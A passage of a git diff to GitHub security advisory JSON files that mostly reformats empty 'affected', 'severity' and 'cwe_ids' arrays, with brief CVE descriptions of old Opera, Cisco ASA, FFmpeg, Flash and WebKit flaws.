+13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x569-chqv-xjj7/GHSA-x569-chqv-xjj7.json b/advisories/unreviewed/2022/05/GHSA-x569-chqv-xjj7/GHSA-x569-chqv-xjj7.json index 3e7731e237b..ef4aa4eb8d5 100644 --- a/advisories/unreviewed/2022/05/GHSA-x569-chqv-xjj7/GHSA-x569-chqv-xjj7.json +++ b/advisories/unreviewed/2022/05/GHSA-x569-chqv-xjj7/GHSA-x569-chqv-xjj7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x6r9-8x7w-8vg7/GHSA-x6r9-8x7w-8vg7.json b/advisories/unreviewed/2022/05/GHSA-x6r9-8x7w-8vg7/GHSA-x6r9-8x7w-8vg7.json index f48c5b967fc..52766a6cda8 100644 --- a/advisories/unreviewed/2022/05/GHSA-x6r9-8x7w-8vg7/GHSA-x6r9-8x7w-8vg7.json +++ b/advisories/unreviewed/2022/05/GHSA-x6r9-8x7w-8vg7/GHSA-x6r9-8x7w-8vg7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x83w-rcx4-rx6c/GHSA-x83w-rcx4-rx6c.json b/advisories/unreviewed/2022/05/GHSA-x83w-rcx4-rx6c/GHSA-x83w-rcx4-rx6c.json index 46e04d716a0..95a911fdbce 100644 --- a/advisories/unreviewed/2022/05/GHSA-x83w-rcx4-rx6c/GHSA-x83w-rcx4-rx6c.json +++ b/advisories/unreviewed/2022/05/GHSA-x83w-rcx4-rx6c/GHSA-x83w-rcx4-rx6c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x96j-w627-27m2/GHSA-x96j-w627-27m2.json b/advisories/unreviewed/2022/05/GHSA-x96j-w627-27m2/GHSA-x96j-w627-27m2.json index c45d2ce5fe7..45267e29d19 100644 --- a/advisories/unreviewed/2022/05/GHSA-x96j-w627-27m2/GHSA-x96j-w627-27m2.json +++ b/advisories/unreviewed/2022/05/GHSA-x96j-w627-27m2/GHSA-x96j-w627-27m2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x9pf-gc5f-vghh/GHSA-x9pf-gc5f-vghh.json b/advisories/unreviewed/2022/05/GHSA-x9pf-gc5f-vghh/GHSA-x9pf-gc5f-vghh.json index 4cd73ff7231..e4ddaff56bf 100644 --- a/advisories/unreviewed/2022/05/GHSA-x9pf-gc5f-vghh/GHSA-x9pf-gc5f-vghh.json +++ b/advisories/unreviewed/2022/05/GHSA-x9pf-gc5f-vghh/GHSA-x9pf-gc5f-vghh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x9qx-4pqw-rhvw/GHSA-x9qx-4pqw-rhvw.json b/advisories/unreviewed/2022/05/GHSA-x9qx-4pqw-rhvw/GHSA-x9qx-4pqw-rhvw.json index e3af3f00e49..4179d3dce68 100644 --- a/advisories/unreviewed/2022/05/GHSA-x9qx-4pqw-rhvw/GHSA-x9qx-4pqw-rhvw.json +++ b/advisories/unreviewed/2022/05/GHSA-x9qx-4pqw-rhvw/GHSA-x9qx-4pqw-rhvw.json @@ -7,12 +7,8 @@ "CVE-2010-2665" ], "details": "Cross-site scripting (XSS) vulnerability in Opera before 10.54 on Windows and Mac OS X, and before 10.11 on UNIX platforms, allows remote attackers to inject arbitrary web script or HTML via a data: URI, related to incorrect detection of the \"opening site.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xcmr-36f6-qgp2/GHSA-xcmr-36f6-qgp2.json b/advisories/unreviewed/2022/05/GHSA-xcmr-36f6-qgp2/GHSA-xcmr-36f6-qgp2.json index 0f09215eb32..7f2aff5da83 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcmr-36f6-qgp2/GHSA-xcmr-36f6-qgp2.json +++ b/advisories/unreviewed/2022/05/GHSA-xcmr-36f6-qgp2/GHSA-xcmr-36f6-qgp2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xf2c-wp2f-v3jr/GHSA-xf2c-wp2f-v3jr.json b/advisories/unreviewed/2022/05/GHSA-xf2c-wp2f-v3jr/GHSA-xf2c-wp2f-v3jr.json index a4d4ed8a9e5..1b28a9ff1c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-xf2c-wp2f-v3jr/GHSA-xf2c-wp2f-v3jr.json +++ b/advisories/unreviewed/2022/05/GHSA-xf2c-wp2f-v3jr/GHSA-xf2c-wp2f-v3jr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xg9c-9wrp-86xv/GHSA-xg9c-9wrp-86xv.json b/advisories/unreviewed/2022/05/GHSA-xg9c-9wrp-86xv/GHSA-xg9c-9wrp-86xv.json index c2b6c71a4fe..1fdba65885e 100644 --- a/advisories/unreviewed/2022/05/GHSA-xg9c-9wrp-86xv/GHSA-xg9c-9wrp-86xv.json +++ b/advisories/unreviewed/2022/05/GHSA-xg9c-9wrp-86xv/GHSA-xg9c-9wrp-86xv.json @@ -7,12 +7,8 @@ "CVE-2010-2816" ], "details": "Unspecified vulnerability in the SIP inspection feature on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.0 before 8.0(5.17), 8.1 before 8.1(2.45), and 8.2 before 8.2(2.13) allows remote attackers to cause a denial of service (device reload) via crafted SIP packets, aka Bug ID CSCtd32106.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xh56-3xp6-p447/GHSA-xh56-3xp6-p447.json b/advisories/unreviewed/2022/05/GHSA-xh56-3xp6-p447/GHSA-xh56-3xp6-p447.json index 038b102f105..f139f167407 100644 --- a/advisories/unreviewed/2022/05/GHSA-xh56-3xp6-p447/GHSA-xh56-3xp6-p447.json +++ b/advisories/unreviewed/2022/05/GHSA-xh56-3xp6-p447/GHSA-xh56-3xp6-p447.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xh96-5xc9-3w5h/GHSA-xh96-5xc9-3w5h.json b/advisories/unreviewed/2022/05/GHSA-xh96-5xc9-3w5h/GHSA-xh96-5xc9-3w5h.json index 2852935179b..3194585899f 100644 --- a/advisories/unreviewed/2022/05/GHSA-xh96-5xc9-3w5h/GHSA-xh96-5xc9-3w5h.json +++ b/advisories/unreviewed/2022/05/GHSA-xh96-5xc9-3w5h/GHSA-xh96-5xc9-3w5h.json @@ -7,12 +7,8 @@ "CVE-2010-2188" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code by calling the ActionScript native object 2200 connect method multiple times with different arguments, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, and CVE-2010-2187.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xp93-v7v5-cx68/GHSA-xp93-v7v5-cx68.json b/advisories/unreviewed/2022/05/GHSA-xp93-v7v5-cx68/GHSA-xp93-v7v5-cx68.json index a7cf2a8638f..c0c54f9b637 100644 --- a/advisories/unreviewed/2022/05/GHSA-xp93-v7v5-cx68/GHSA-xp93-v7v5-cx68.json +++ b/advisories/unreviewed/2022/05/GHSA-xp93-v7v5-cx68/GHSA-xp93-v7v5-cx68.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xr66-hfr3-pgvx/GHSA-xr66-hfr3-pgvx.json b/advisories/unreviewed/2022/05/GHSA-xr66-hfr3-pgvx/GHSA-xr66-hfr3-pgvx.json index 99a8a03c2d2..1e31f6600e4 100644 --- a/advisories/unreviewed/2022/05/GHSA-xr66-hfr3-pgvx/GHSA-xr66-hfr3-pgvx.json +++ b/advisories/unreviewed/2022/05/GHSA-xr66-hfr3-pgvx/GHSA-xr66-hfr3-pgvx.json @@ -7,12 +7,8 @@ "CVE-2012-0857" ], "details": "Multiple buffer overflows in the get_qcx function in the J2K decoder (j2kdec.c) in libavcode in FFmpeg before 0.9.1 allow remote attackers to cause a denial of service (application crash) via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xrcc-hq3w-rm7j/GHSA-xrcc-hq3w-rm7j.json b/advisories/unreviewed/2022/05/GHSA-xrcc-hq3w-rm7j/GHSA-xrcc-hq3w-rm7j.json index e9d49b50f97..d2ca323b1f1 100644 --- a/advisories/unreviewed/2022/05/GHSA-xrcc-hq3w-rm7j/GHSA-xrcc-hq3w-rm7j.json +++ b/advisories/unreviewed/2022/05/GHSA-xrcc-hq3w-rm7j/GHSA-xrcc-hq3w-rm7j.json @@ -7,12 +7,8 @@ "CVE-2011-2429" ], "details": "Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, related to a \"security control bypass.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xvw5-r9xw-9jjv/GHSA-xvw5-r9xw-9jjv.json b/advisories/unreviewed/2022/05/GHSA-xvw5-r9xw-9jjv/GHSA-xvw5-r9xw-9jjv.json index 5eecf0943be..c2f379d8b57 100644 --- a/advisories/unreviewed/2022/05/GHSA-xvw5-r9xw-9jjv/GHSA-xvw5-r9xw-9jjv.json +++ b/advisories/unreviewed/2022/05/GHSA-xvw5-r9xw-9jjv/GHSA-xvw5-r9xw-9jjv.json @@ -7,12 +7,8 @@ "CVE-2013-1004" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xwv8-8669-gwr6/GHSA-xwv8-8669-gwr6.json b/advisories/unreviewed/2022/05/GHSA-xwv8-8669-gwr6/GHSA-xwv8-8669-gwr6.json index 3037a4273d8..45acb0069c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-xwv8-8669-gwr6/GHSA-xwv8-8669-gwr6.json +++ b/advisories/unreviewed/2022/05/GHSA-xwv8-8669-gwr6/GHSA-xwv8-8669-gwr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/06/GHSA-f2w4-mp23-hr7q/GHSA-f2w4-mp23-hr7q.json b/advisories/unreviewed/2022/06/GHSA-f2w4-mp23-hr7q/GHSA-f2w4-mp23-hr7q.json index 005adc115c6..c976609f9bb 100644 --- a/advisories/unreviewed/2022/06/GHSA-f2w4-mp23-hr7q/GHSA-f2w4-mp23-hr7q.json +++ b/advisories/unreviewed/2022/06/GHSA-f2w4-mp23-hr7q/GHSA-f2w4-mp23-hr7q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/06/GHSA-q3fm-hh84-2m38/GHSA-q3fm-hh84-2m38.json b/advisories/unreviewed/2022/06/GHSA-q3fm-hh84-2m38/GHSA-q3fm-hh84-2m38.json index ae39e046dde..bb31219b2a4 100644 --- a/advisories/unreviewed/2022/06/GHSA-q3fm-hh84-2m38/GHSA-q3fm-hh84-2m38.json +++ b/advisories/unreviewed/2022/06/GHSA-q3fm-hh84-2m38/GHSA-q3fm-hh84-2m38.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-26jh-23q3-rwhv/GHSA-26jh-23q3-rwhv.json b/advisories/unreviewed/2022/08/GHSA-26jh-23q3-rwhv/GHSA-26jh-23q3-rwhv.json index 0324b6e6a3a..b6e6e63d159 100644 --- a/advisories/unreviewed/2022/08/GHSA-26jh-23q3-rwhv/GHSA-26jh-23q3-rwhv.json +++ b/advisories/unreviewed/2022/08/GHSA-26jh-23q3-rwhv/GHSA-26jh-23q3-rwhv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-2mh9-q72v-7c49/GHSA-2mh9-q72v-7c49.json b/advisories/unreviewed/2022/08/GHSA-2mh9-q72v-7c49/GHSA-2mh9-q72v-7c49.json index f7ac14a6a38..dc20428c181 100644 --- a/advisories/unreviewed/2022/08/GHSA-2mh9-q72v-7c49/GHSA-2mh9-q72v-7c49.json +++ b/advisories/unreviewed/2022/08/GHSA-2mh9-q72v-7c49/GHSA-2mh9-q72v-7c49.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-2qgh-55fc-jw7c/GHSA-2qgh-55fc-jw7c.json b/advisories/unreviewed/2022/08/GHSA-2qgh-55fc-jw7c/GHSA-2qgh-55fc-jw7c.json index 74e41f61df0..1db3757ae33 100644 --- a/advisories/unreviewed/2022/08/GHSA-2qgh-55fc-jw7c/GHSA-2qgh-55fc-jw7c.json +++ b/advisories/unreviewed/2022/08/GHSA-2qgh-55fc-jw7c/GHSA-2qgh-55fc-jw7c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-2xwx-3gmg-f9vj/GHSA-2xwx-3gmg-f9vj.json b/advisories/unreviewed/2022/08/GHSA-2xwx-3gmg-f9vj/GHSA-2xwx-3gmg-f9vj.json index 940bd15026a..feab326a068 100644 --- a/advisories/unreviewed/2022/08/GHSA-2xwx-3gmg-f9vj/GHSA-2xwx-3gmg-f9vj.json +++ b/advisories/unreviewed/2022/08/GHSA-2xwx-3gmg-f9vj/GHSA-2xwx-3gmg-f9vj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-3mxf-xw42-ccg7/GHSA-3mxf-xw42-ccg7.json b/advisories/unreviewed/2022/08/GHSA-3mxf-xw42-ccg7/GHSA-3mxf-xw42-ccg7.json index 0ea492f9c19..b2312768b1d 100644 --- a/advisories/unreviewed/2022/08/GHSA-3mxf-xw42-ccg7/GHSA-3mxf-xw42-ccg7.json +++ b/advisories/unreviewed/2022/08/GHSA-3mxf-xw42-ccg7/GHSA-3mxf-xw42-ccg7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-3qq7-5vqp-8g9q/GHSA-3qq7-5vqp-8g9q.json b/advisories/unreviewed/2022/08/GHSA-3qq7-5vqp-8g9q/GHSA-3qq7-5vqp-8g9q.json index 31ba5a6b83a..efb0006cec7 100644 --- a/advisories/unreviewed/2022/08/GHSA-3qq7-5vqp-8g9q/GHSA-3qq7-5vqp-8g9q.json +++ b/advisories/unreviewed/2022/08/GHSA-3qq7-5vqp-8g9q/GHSA-3qq7-5vqp-8g9q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-44jq-4pj6-pmwm/GHSA-44jq-4pj6-pmwm.json b/advisories/unreviewed/2022/08/GHSA-44jq-4pj6-pmwm/GHSA-44jq-4pj6-pmwm.json index 0f534324456..592e75cc878 100644 --- a/advisories/unreviewed/2022/08/GHSA-44jq-4pj6-pmwm/GHSA-44jq-4pj6-pmwm.json +++ b/advisories/unreviewed/2022/08/GHSA-44jq-4pj6-pmwm/GHSA-44jq-4pj6-pmwm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-4c92-q2fx-wwfh/GHSA-4c92-q2fx-wwfh.json b/advisories/unreviewed/2022/08/GHSA-4c92-q2fx-wwfh/GHSA-4c92-q2fx-wwfh.json index 69f08ac9e37..e141473b079 100644 --- a/advisories/unreviewed/2022/08/GHSA-4c92-q2fx-wwfh/GHSA-4c92-q2fx-wwfh.json +++ b/advisories/unreviewed/2022/08/GHSA-4c92-q2fx-wwfh/GHSA-4c92-q2fx-wwfh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-5ffm-7chv-mvp8/GHSA-5ffm-7chv-mvp8.json b/advisories/unreviewed/2022/08/GHSA-5ffm-7chv-mvp8/GHSA-5ffm-7chv-mvp8.json index ec8742d15cf..867a546989b 100644 --- a/advisories/unreviewed/2022/08/GHSA-5ffm-7chv-mvp8/GHSA-5ffm-7chv-mvp8.json +++ b/advisories/unreviewed/2022/08/GHSA-5ffm-7chv-mvp8/GHSA-5ffm-7chv-mvp8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-67wc-cv7q-cw3f/GHSA-67wc-cv7q-cw3f.json b/advisories/unreviewed/2022/08/GHSA-67wc-cv7q-cw3f/GHSA-67wc-cv7q-cw3f.json index b0d36c9915b..806ff748c64 100644 --- a/advisories/unreviewed/2022/08/GHSA-67wc-cv7q-cw3f/GHSA-67wc-cv7q-cw3f.json +++ b/advisories/unreviewed/2022/08/GHSA-67wc-cv7q-cw3f/GHSA-67wc-cv7q-cw3f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-68c4-83fp-6q5g/GHSA-68c4-83fp-6q5g.json b/advisories/unreviewed/2022/08/GHSA-68c4-83fp-6q5g/GHSA-68c4-83fp-6q5g.json index d845b2f071c..d2b724bd60c 100644 --- a/advisories/unreviewed/2022/08/GHSA-68c4-83fp-6q5g/GHSA-68c4-83fp-6q5g.json +++ b/advisories/unreviewed/2022/08/GHSA-68c4-83fp-6q5g/GHSA-68c4-83fp-6q5g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-6c2r-56vw-59p3/GHSA-6c2r-56vw-59p3.json b/advisories/unreviewed/2022/08/GHSA-6c2r-56vw-59p3/GHSA-6c2r-56vw-59p3.json index d73ea684658..791d701a5ae 100644 --- a/advisories/unreviewed/2022/08/GHSA-6c2r-56vw-59p3/GHSA-6c2r-56vw-59p3.json +++ b/advisories/unreviewed/2022/08/GHSA-6c2r-56vw-59p3/GHSA-6c2r-56vw-59p3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-6pmj-qg5w-7h65/GHSA-6pmj-qg5w-7h65.json b/advisories/unreviewed/2022/08/GHSA-6pmj-qg5w-7h65/GHSA-6pmj-qg5w-7h65.json index 5de67ec8cc4..e7af9d969c2 100644 --- a/advisories/unreviewed/2022/08/GHSA-6pmj-qg5w-7h65/GHSA-6pmj-qg5w-7h65.json +++ b/advisories/unreviewed/2022/08/GHSA-6pmj-qg5w-7h65/GHSA-6pmj-qg5w-7h65.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-6v2c-5jhm-w6h9/GHSA-6v2c-5jhm-w6h9.json b/advisories/unreviewed/2022/08/GHSA-6v2c-5jhm-w6h9/GHSA-6v2c-5jhm-w6h9.json index 7433dbbf3ac..f919a2356be 100644 --- a/advisories/unreviewed/2022/08/GHSA-6v2c-5jhm-w6h9/GHSA-6v2c-5jhm-w6h9.json +++ b/advisories/unreviewed/2022/08/GHSA-6v2c-5jhm-w6h9/GHSA-6v2c-5jhm-w6h9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-74pj-xh5v-pwfg/GHSA-74pj-xh5v-pwfg.json b/advisories/unreviewed/2022/08/GHSA-74pj-xh5v-pwfg/GHSA-74pj-xh5v-pwfg.json index 35f3837f974..0ba98f892cd 100644 --- a/advisories/unreviewed/2022/08/GHSA-74pj-xh5v-pwfg/GHSA-74pj-xh5v-pwfg.json +++ b/advisories/unreviewed/2022/08/GHSA-74pj-xh5v-pwfg/GHSA-74pj-xh5v-pwfg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-78h4-h9x2-x5x9/GHSA-78h4-h9x2-x5x9.json b/advisories/unreviewed/2022/08/GHSA-78h4-h9x2-x5x9/GHSA-78h4-h9x2-x5x9.json index 660e1c5ba0a..ef3ac15df37 100644 --- a/advisories/unreviewed/2022/08/GHSA-78h4-h9x2-x5x9/GHSA-78h4-h9x2-x5x9.json +++ b/advisories/unreviewed/2022/08/GHSA-78h4-h9x2-x5x9/GHSA-78h4-h9x2-x5x9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-8663-g87g-wwq3/GHSA-8663-g87g-wwq3.json b/advisories/unreviewed/2022/08/GHSA-8663-g87g-wwq3/GHSA-8663-g87g-wwq3.json index aa65ca7dd0d..5f4790b23ec 100644 --- a/advisories/unreviewed/2022/08/GHSA-8663-g87g-wwq3/GHSA-8663-g87g-wwq3.json +++ b/advisories/unreviewed/2022/08/GHSA-8663-g87g-wwq3/GHSA-8663-g87g-wwq3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-8987-j66m-pc6v/GHSA-8987-j66m-pc6v.json b/advisories/unreviewed/2022/08/GHSA-8987-j66m-pc6v/GHSA-8987-j66m-pc6v.json index f18ea3038eb..016a63098a0 100644 --- a/advisories/unreviewed/2022/08/GHSA-8987-j66m-pc6v/GHSA-8987-j66m-pc6v.json +++ b/advisories/unreviewed/2022/08/GHSA-8987-j66m-pc6v/GHSA-8987-j66m-pc6v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-8f45-m8mm-fw4r/GHSA-8f45-m8mm-fw4r.json b/advisories/unreviewed/2022/08/GHSA-8f45-m8mm-fw4r/GHSA-8f45-m8mm-fw4r.json index b96bad703e3..3ffe2e7e632 100644 --- a/advisories/unreviewed/2022/08/GHSA-8f45-m8mm-fw4r/GHSA-8f45-m8mm-fw4r.json +++ b/advisories/unreviewed/2022/08/GHSA-8f45-m8mm-fw4r/GHSA-8f45-m8mm-fw4r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-cwv4-v9xw-35rr/GHSA-cwv4-v9xw-35rr.json b/advisories/unreviewed/2022/08/GHSA-cwv4-v9xw-35rr/GHSA-cwv4-v9xw-35rr.json index af007c3cd62..b2fec8a0753 100644 --- a/advisories/unreviewed/2022/08/GHSA-cwv4-v9xw-35rr/GHSA-cwv4-v9xw-35rr.json +++ b/advisories/unreviewed/2022/08/GHSA-cwv4-v9xw-35rr/GHSA-cwv4-v9xw-35rr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-cxpq-9r58-6r8x/GHSA-cxpq-9r58-6r8x.json b/advisories/unreviewed/2022/08/GHSA-cxpq-9r58-6r8x/GHSA-cxpq-9r58-6r8x.json index 8cd6630e50f..adf9d18e60e 100644 --- a/advisories/unreviewed/2022/08/GHSA-cxpq-9r58-6r8x/GHSA-cxpq-9r58-6r8x.json +++ b/advisories/unreviewed/2022/08/GHSA-cxpq-9r58-6r8x/GHSA-cxpq-9r58-6r8x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-g38m-wh86-jrvf/GHSA-g38m-wh86-jrvf.json 